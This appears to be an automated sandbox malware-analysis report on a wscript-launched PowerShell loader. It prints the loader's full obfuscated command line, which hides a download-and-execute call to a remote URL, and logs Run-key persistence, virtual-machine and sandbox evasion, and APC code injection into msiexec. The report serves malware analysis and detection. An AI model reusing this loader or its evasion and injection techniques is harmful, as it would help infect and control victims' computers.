            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Hles;function Strejflyset($Chefkokkes){ .($Postlachrymal) ($Chefkokkes)} function Krigskunst($Diplomatariers){$Occipitally=5;do{$undefinably+=$Diplomatariers[$Occipitally];Format-List;$Occipitally+=6} until(!$Diplomatariers[$Occipitally])$undefinably}$Lovgennemgangene=Krigskunst 'UdskrnHorrieGlyphTBagdi. atoW';$Lovgennemgangene+=Krigskunst 'Lame ECzbiaB SrloCLarvelArthrINuthaeCha tN Grant';$outyelps=Krigskunst ' R stMEvoluoRed lzAf.riiPelskl,kupulhungaaKobra/';$Affirmationerne=Krigskunst 'LrerfTDedoll Intess tte1Valut2';$Overkrslerne='Inden[HesitN,ainteJohnsTUnwea.OvergsFoursEKval,RacetyVRacefIHandlcAyensEMoun PSarono sseI lomn BlomTCatacmNonofAsimreNBygniACoqueG Kva,eKrat RKarse]Dermi:p.rvi:DelinSVeinae uthycOmphauLabo RChoktI reentGasbey evepStatirInf rodetaltcane oDyn ecEgadsO U emlKelso=St,rt$ raflaDeflofSom tfUnth I PhilrPrepgmBes.na.ilbut Sttyi Spr,oFusionB vareRethrRLabdan autoe';$outyelps+=Krigskunst 'Sn.er5Klods.Ps mm0Hypok Presi(FohatWAkkusiSeksunAeo idRefleoSheatwProcesSidst stikdNHandgTAntim mbel1Koll 0Hjtta. Opna0Bar u;Tr,ch A ndWNotouiCistsnRhomb6 Afsv4Damp,; elep snd gxCompe6 ircu4nedsl; Refo temnrMerrivT bul:spalt1 Bese3 Fors4Anti .Jo,fr0.ioly)Navle MariGLantheGapescPopulk GranoSla t/tekst2Whitt0K udd1Excur0,nfar0 imsf1Sklde0Convo1Rollm S rvFBibeliTh.rar Ci teRetiaf Halco Z ppxth,ee/Infla1 ryns3Acros4Trium.Forsg0';$dermutation=Krigskunst ' DecaUjordsSA pliEExstirRhino-.arboaTaeniGBeh,nEEskatnBygget';$Tredjeinstansbevillings=Krigskunst 'Fi kehH rcutSkudetSpitep Etro:Untea/endod/s alosOvermbPolyat hysieGenbrcS,amkhAssocu ilbsS uff.Unlugc .ortoMeu rm Geni/Flu tz.erviiantapgAnticiTyran/Sulf,H Anthe .ypenBonifgEv ngiestisvTishre BundlImmunsNappee Trafn S iss Krnk. RetfcGenlyhhumanm';$Textus=Krigskunst 'Am hi>';$Postlachrymal=Krigskunst 'B.deriF erdE HydrX';$Occipitallyncorruptibly='Unlax';$Emmensite='\Leveringstiden.Req';Strejflyset (Krigskunst 'Janic$ AndeGTerpilSkyldO Mal.bli.abaUnwinl weig:ForvuVKokosAWilliNLeje D PartO Udbym asypRWed eAMar aaDiiodd,ookeeGrund= Bead$Pa kwe DrivnCoracvTrick:BobleaT wlipSubtrplen pdHydr ABu.bitPinnuaB.dmt+Ene g$FolkeEkakerMNonosMOstraEM orhN AverSSystei accuTAfkryE');Strejflyset (Krigskunst 'Xyli,$ DiphGgif.eLBortfo.ottiBenglaAOvnenlWhi k: ,mrevLn,inaIldhun LoneD MariDBal,sYphilobCrackDRenteEMommanDecodSvarme=Lumin$QuizzttilslrNi htEKes.rd r faj HaanE M soIhektonReshosDisowTEccenaT,lemNZymicSFleecBArt se ,pprV For IUntelLDominL Chaei Forkn ,oncGNeds sTroa .For asP,ytiPAmidoLunderISuccetPepsi(Atomp$ overT micreHovmexOnychtGalgeUStol,sUnste)');Strejflyset (Krigskunst $Overkrslerne);$Tredjeinstansbevillings=$Vanddybdens[0];$Gavmildes=(Krigskunst 'Mater$KerfsgAdenolL.geroSupe,b pmosA ArgolStrad:ZapotbSuspelForkog BespeStdtrDCaly ASlyn Lfo,eneG,ydenForha9dvelr0Afteg=AttennbortgeImpl w Lapp-FuldhOMagisB arkiJb,ddeeUnexcCForlftHaspe pynteSTa peY ongS BommtBetale I,dhMDegra. Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF7C4F92AEB push ss; ret 2_2_00007FF7C4F92AEC
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF7C4F9750B push ebx; iretd 2_2_00007FF7C4F9754A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF7C5067E0B push eax; retf 2_2_00007FF7C5067E0C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0451D6E5 pushad ; retf 4_2_0451D6F9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_045136AB push ebx; iretd 4_2_045136EA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04519073 push eax; retf 4_2_04519099
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MotorskibJump to behavior
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MotorskibJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Queries memory information (via WMI often done to detect virtual machines)
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_MemoryDevice
            Tries to detect Any.run
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: powershell.exe, 00000004.00000002.128202232697.0000000006A80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: powershell.exe, 00000004.00000002.128209937242.000000000853A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXES
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9928Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9917Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7068Thread sleep count: 2000 > 30Jump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\msiexec.exeThread sleep count: Count: 2000 delay: -5Jump to behavior
            Source: powershell.exe, 00000004.00000002.128382144909.000000000D529000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: msiexec.exe, 00000006.00000003.128560180223.000000000885F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.128753973581.000000000885F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
            Source: powershell.exe, 00000004.00000002.128382144909.000000000D529000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: powershell.exe, 00000004.00000002.128209937242.000000000853A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exes
            Source: powershell.exe, 00000004.00000002.128382144909.000000000D529000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
            Source: powershell.exe, 00000004.00000002.128382144909.000000000D529000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: powershell.exe, 00000004.00000002.128382144909.000000000D529000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: powershell.exe, 00000004.00000002.128382144909.000000000D529000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: powershell.exe, 00000004.00000002.128382144909.000000000D529000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
            Source: msiexec.exe, 00000006.00000002.128753973581.000000000886C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.128560406793.000000000889E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.128753973581.000000000889E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.128560180223.000000000886C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: powershell.exe, 00000004.00000002.128202232697.0000000006A80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: powershell.exe, 00000004.00000002.128382144909.000000000D529000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: powershell.exe, 00000004.00000002.128382144909.000000000D529000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: powershell.exe, 00000004.00000002.128382144909.000000000D529000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: powershell.exe, 00000002.00000002.127616099079.0000027E9C21E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: powershell.exe, 00000004.00000002.128382144909.000000000D529000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0436D41C LdrInitializeThunk,LdrInitializeThunk,4_2_0436D41C

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Early bird code injection technique detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Yara detected Powershell download and execute
            Source: Yara matchFile source: amsi64_6212.amsi.csv, type: OTHER
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6212, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3592, type: MEMORYSTR
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3AE0000Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Hles;function Strejflyset($Chefkokkes){ .($Postlachrymal) ($Chefkokkes)} function Krigskunst($Diplomatariers){$Occipitally=5;do{$undefinably+=$Diplomatariers[$Occipitally];Format-List;$Occipitally+=6} until(!$Diplomatariers[$Occipitally])$undefinably}$Lovgennemgangene=Krigskunst 'UdskrnHorrieGlyphTBagdi. atoW';$Lovgennemgangene+=Krigskunst 'Lame ECzbiaB SrloCLarvelArthrINuthaeCha tN Grant';$outyelps=Krigskunst ' R stMEvoluoRed lzAf.riiPelskl,kupulhungaaKobra/';$Affirmationerne=Krigskunst 'LrerfTDedoll Intess tte1Valut2';$Overkrslerne='Inden[HesitN,ainteJohnsTUnwea.OvergsFoursEKval,RacetyVRacefIHandlcAyensEMoun PSarono sseI lomn BlomTCatacmNonofAsimreNBygniACoqueG Kva,eKrat RKarse]Dermi:p.rvi:DelinSVeinae uthycOmphauLabo RChoktI reentGasbey evepStatirInf rodetaltcane 